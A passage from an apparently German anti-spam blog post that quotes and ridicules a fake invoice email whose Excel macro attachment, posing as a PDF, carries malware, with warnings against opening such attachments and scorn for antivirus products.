…um die Ausführung von Programmcode, der mit einer irreführend formulierten Spam zugestellt wurde. Wer dieses Dokument mit Microsoft Word öffnet und die Ausführung von Makros zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. ☣️

Nein danke, ich habe keine weiteren Fragen. 💩

Ich wünsche dir heute Glück!

Wer sich nicht auf sein Glück verlassen möchte, löscht diese Spam einfach. Wer sich auf sein Antivirus-Schlangenöl verlässt, ist einmal mehr verlassen, denn diese klare Schadsoftware wird zurzeit nur von rund zehn Prozent der gängigen Antivirus-Programme als Schadsoftware erkannt. 👎

Schlangenöl funktioniert also nicht. Es funktioniert nie bei aktueller Schadsoftware. Wer so einen Müll an „Hallo“ hingegen einfach löscht, statt wie ein Blödchen darauf herumzuklicken, ist jedoch auf der sicheren Seite und darf seinen Computer behalten. 🗑️👍

Freundliche Grüße,

Erin

Wie jetzt, nicht mehr Gretel? 🤦

Im Moment, wo wegen Corona vermehrt im so genannten „Homeoffice“ gearbeitet wird, häufen sich solche Versuche, den Menschen Schadsoftware unterzujubeln. Die Spams kommen auch durch empfindlich eingestellte Spamfilter. Ich kann nur empfehlen, äußerst vorsichtig mit Links aus E-Mail und mit E-Mail-Anhängen umzugehen und niemals in eine E-Mail zu klicken, ohne sich vorher durch ein kurzes Telefongespräch davon vergewissert zu haben, dass der angegebene Absender auch der richtige Absender ist. Denn Absender einer E-Mail können beliebig gefälscht werden. Dettelbach ist überall.

Natürlich enthält die angebliche Rechnung…

So sieht die angebliche Rechnung aus

…eine „Aufforderung von Microsoft“, dass man die Ausführung von Makros freischalten soll. Wer das tut, hat verloren und bekommt eine frische Ladung Gift geliefert. 🍄

Copyright 2020 Cellonic Inc. oder Tochtergesellschaften. Alle Rechte vorbehalten.
Cellonic Services Europe S.à r.l.
38 avenue Mike F. Kennedy
L-1855 Luxembourg
Handelsregisternummer Luxemburg: B-93815
Gewerbelizenznummer: 132595
USt.-Identifikationsnummer Luxemburg: LU 19647142

Meine Version dieser Spam wurde über eine IP-Adresse aus Russland versendet. Diese Mail hat definitiv niemals…

Wichtiger Hinweis: Wenn Sie dieser E-Mail antworten, wird Cellonic.com Ihre E-Mail-Adresse mit einer von Cellonic.com bereitgestellten Adresse ersetzen, um Ihre Identität zu schützen, und die Nachricht in Ihrem Namen weiterleiten. Um einen möglichen Betrug zu verhindern, setzt Cellonic.com Filtertechniken ein. Nachrichten, die diesen Filter nicht passieren, werden nicht weitergeleitet. Amazon.de behält Kopien aller über diesen Service gesendeten und empfangenen E-Mails, einschließlich der Nachricht, die Sie hier eingeben. Cellonic.com wird diese Kopien insbesondere zur Klärung von eingereichten A-bis-z-Garantie-Anträgen heranziehen. Indem Sie diesen Dienst nutzen, erklären Sie sich mit diesem Vorgehen einverstanden.

…einen Server von Amazon auch nur gesehen.

von AVAST
verifiziert

Ja ja, ist schon klar, da hängt man frische Schadsoftware an eine Spam und schreibt in die Spam rein, dass ein Antivirus-Schlangenöl nachgeguckt hat, dass die Spam auch virenfrei ist. Einmal ganz davon abgesehen, dass Avast wegen seiner verlogenen und nutzerbestupsenden Scareware-Machenschaften eine Reputation auf dem Niveau eines Plumpsklos haben sollte. 🚽

info@company-name.com

Ah ja! 🤣

Invoice 55181

Mittwoch, 21. Oktober 2020

Eine Rechnung? Aber ich habe doch gar nichts gekauft. ⛔

To Customer :

Der Absender weiß nicht, wie ich heiße. Er kennt von mir nur eine Mailadresse, die er irgendwo eingesammelt oder gekauft hat. Da schreibt er eine Mail hin. Leider…

Please find your invoice attached.

…ist ihm beim Schreiben das Mailpapier ausgegangen, und deshalb konnte er im Text seiner Mail weder den Rechnungsbetrag, noch die Bankverbindung noch sonstwas nennen. Um irgendetwas zu erfahren, muss ich einen Mailanhang öffnen. Ich kann natürlich auch…

If you have any questions please feel free to contact me.

…so frei sein, Kontakt zum Absender aufzunehmen. Leider hat er weder eine Telefonnummer noch eine Anschrift noch sonstwas. Er hat nur einen Mailanhang, der mit einer unpersönlich formulierten Massenspam rausgesendet wurde. 👤

Your business is much appreciated.

Das liegt daran, dass das Geschäft dieses Durchschnittshalunkens in der Spam besteht. Und zwar in der Spam, in der Empfänger irgendwelche Anhänge aufmachen müssen, um irgendetwas zu erfahren. 🙄

Sincerely,

Accounting

Mit Winkewinke vom spammenden Halbhirn. 👋

To view attachment
Open the attached PDF file. You must have Acrobat® Reader® installed to view the attachment.

So so, das soll also ein PDF im Anhang sein? 🤔

$ file Inv_55181_from_951805.xlsm 
Inv_55181_from_951805.xlsm: Microsoft Excel 2007+
$ _

Mitnichten, es ist eine Arbeitsmappe für Microsoft Excel. Schon ein PDF in einer derartigen Spam wäre gefährlich und sollte besser auf gar keinen Fall im Acrobat mit seiner erschröcklichen Sicherheitsgeschichte geöffnet werden, eine Office-Datei mit Makros ist aber ganz sicher das reinste Gift. 💀

Screenshot des Dialogfensters, das beim Öffnen des Dokumentes mit Libre Office angezeigt wird. -- Dieses Dokument enthält Makros. -- Makros können Viren enthalten. Die Ausführung dieser Makros wird aufgrund der aktuellen Makrosicherheits-Einstellung unter Extras - Optionen - LibreOffice-Sicherheit unterbunden. -- Manche Funktionen stehen daher möglicherweise nicht zur Verfügung. -- [OK]

Der wichtigste Satz in dieser Warnung, die man erhält, wenn man die Excel-Mappe mit LibreOffice öffnet, ist folgender: Makros können Viren enthalten. Ja, ein Makro für ein Office-Programm kann beinahe alles, was eine ausführbare Datei auch kann. Warum? Weil bei Microsoft keiner an Sicherheit gedacht hat, als dieses Feature in Office implementiert wurde; weil keiner damit gerechnet hat, dass es einen kriminellen Missbrauch dieser Möglichkeit geben könnte. Und jetzt haben wir den Käse. 🧀

Haftbar wird Microsoft für die Folgen dieser dummen Entscheidung nicht gemacht. Deshalb haben Microsoft-Nutzer auch nur den Schaden, aber keinerlei Entschädigung. Wenn ganze Betriebe von Kriminellen übernommen und tagelang mit Erpressungstrojanern sabotiert werden – wie es etwa im Jahr 2017 die Deutsche Bahn AG erleben durfte, nachdem ein Mitarbeiter einen Mailanhang oder eine in der Mail verlinkte Datei geöffnet und damit deutschlandweit Computer der Deutschen Bahn AG sabotiert hat – kommt schnell ein riesiger Schaden zusammen, der sogar Unternehmen in die Insolvenz befördern kann. Aber so lange es dann in den PResseerklärungen hinterher verschleiernd und verdummend „Wir wurden gehackt“ heißt, weil das nun einmal viel epischer klingt als „Einer unserer Mitarbeiter hatte keinerlei Security-Grundkenntnisse, war halt digitaler Analphabet und hat deshalb eine von einem Kriminellen in einer Datei zugestellte Schadsoftware gestartet; wir versuchen gerade, ihn für den angerichteten Schaden haftbar zu machen, denn er hat ja in seiner Bewerbung behauptet, grundlegende Computerkenntnisse zu haben“, so lange wird das erforderliche Bewusstsein, wie wichtig das Gehirn in der Bekämpfung von kriminellen, über das Internet vorgetragenen Attacken ist. Und diese Dummheit, dieses Fehlen von Bewusstsein, diese Unwilligkeit, Wissen zu erlangen – sie sind die Geschäftsgrundlage für den massenhaften Verkauf von Antivirus-Schlangenöl an die von Reklame und Schleichwerbung technoabergläubisch gemachten Menschen.

Die Schadsoftware im Makro ist relativ frisch und wird zurzeit nur von rd. dreißig Prozent der gängigen Antivirus-Programme erkannt. Ein Großteil der Menschen, die sich auf ihr Antivirus-Schlangenöl verlassen, ist also verlassen. Wer hingegen auf sein Gehirn setzt und diese klare Spam sofort als klare Spam erkennt, wer niemals ein unabgesprochen zugestellten Anhang in einer nicht digital signierten E-Mail öffnet, ohne vorher telefonisch nachzufragen, der löscht diesen Müll, ist auf der sicheren Seite und erspart sich die recht regelmäßigen Probleme mit dem Antivirus-Schlangenöl, die zusätzlichen Sicherheitslücken durch das Antivirus-Schlangenöl und den vom Schlangenöl ausgebremsten, mit sich selbst beschäftigten Computer. 🐌

Es wird ja gern von der kommenden Klimakatastrophe berichtet. Aber niemand wirft die Frage auf, wie viel Kohlendioxid in die Atmosphäre gepumpt wird, weil irgendwelche selbst bei ihren Herstellern nicht funktionierenden Schlangenöl-Programme mit hohem Aufwand gefühlte Sicherheit vermitteln sollen, aber gegenüber einer aktuellen Schadsoftware oft nur so hilfreich wie ein auf dem Computer geklebtes Heiligenbildchen sind: Gar nicht. 👎

Es gibt keine Alternative zum besten Antivirusprodukt der Welt: Das Gehirn, das mit Wissen und Verstand seine Entscheidungen trifft. 🧠🛡️